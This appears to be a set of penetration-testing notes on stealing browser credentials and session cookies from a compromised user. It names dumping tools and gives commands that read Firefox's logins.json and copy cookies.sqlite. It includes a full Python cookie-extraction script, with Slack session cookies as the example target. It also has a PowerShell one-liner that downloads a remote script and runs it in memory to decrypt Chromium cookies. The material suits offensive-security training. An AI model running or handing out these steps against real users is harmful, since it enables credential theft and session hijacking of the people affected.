Pentesting Browsers
Dumping memory and cache: focus on credentials
mimipenguin
lazagne
Firefox stored credentials:
| ls -l .mozilla/firefox/ | grep default
cat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .
|
The tool Firefox Decrypt is excellent for decrypting these credentials, and is updated regularly. It requires Python 3.9 to run the latest version. Otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.
Dumping data from session, local data and others
HackBrowserData
HackBrowserData: HackBrowserData is a command-line tool for decrypting and exporting browser data (passwords, history, cookies, bookmarks, credit cards, download history, localStorage and extensions) from the browser. It supports the most popular browsers on the market and runs on Windows, macOS and Linux.
| copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
|
We can copy the file to our machine and use the Python script cookieextractor.py to extract cookies from the Firefox cookies.SQLite database.
This is the script:
| #!/usr/bin/env python3
# Sample Script to extract cookies offile from FireFox sqlite database
# Created by PlainText
import argparse
import sqlite3
def main(dbpath, host, cookie):
conn = sqlite3.connect(dbpath)
cursor = conn.cursor()
if (host == "" and cookie == ""):
query = "SELECT * FROM moz_cookies"
elif (host != "" and cookie == ""):
query = "SELECT * FROM moz_cookies WHERE host LIKE '%{}%'".format(host)
elif (host == "" and cookie != ""):
query = "SELECT * FROM moz_cookies WHERE name LIKE '%{}%'".format(cookie)
elif (host != "" and cookie != ""):
query = "SELECT * FROM moz_cookies WHERE name LIKE '%{}%' AND host LIKE '%{}%'".format(cookie, host)
cursor.execute(query)
records = cursor.fetchall()
rowCount = len(records)
if (rowCount > 0):
for row in records:
print(row)
else:
print("[-] No cookie found with the selected options.")
conn.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--dbpath", "-d", required=True, help="The path to the sqlite cookies database")
parser.add_argument("--host", "-o", required=False, help="The host for the cookie", default="")
parser.add_argument("--cookie", "-c", required=False, help="The name of the cookie", default="")
args = parser.parse_args()
main(args.dbpath, args.host, args.cookie)
|
| python3 cookieextractor.py --dbpath "/home/plaintext/cookies.sqlite" --host slack --cookie d
|
The chromium-based browser also stores its cookies information in an SQLite database. The only difference is that the cookie value is encrypted with Data Protection API (DPAPI). DPAPI is commonly used to encrypt data using information from the current user account or computer.
To get the cookie value, we'll need to perform a decryption routine from the session of the user we compromised.
SharpChromium does what we need: It connects to the current user SQLite cookie database, decrypts the cookie value, and presents the result in JSON format.
Let's use Invoke-SharpChromium, a PowerShell script created by S3cur3Th1sSh1t which uses reflection to load SharpChromium.
PowerShell Script - Invoke-SharpChromium
| IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSh
arpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
Invoke-SharpChromium -Command "cookies slack.com"
|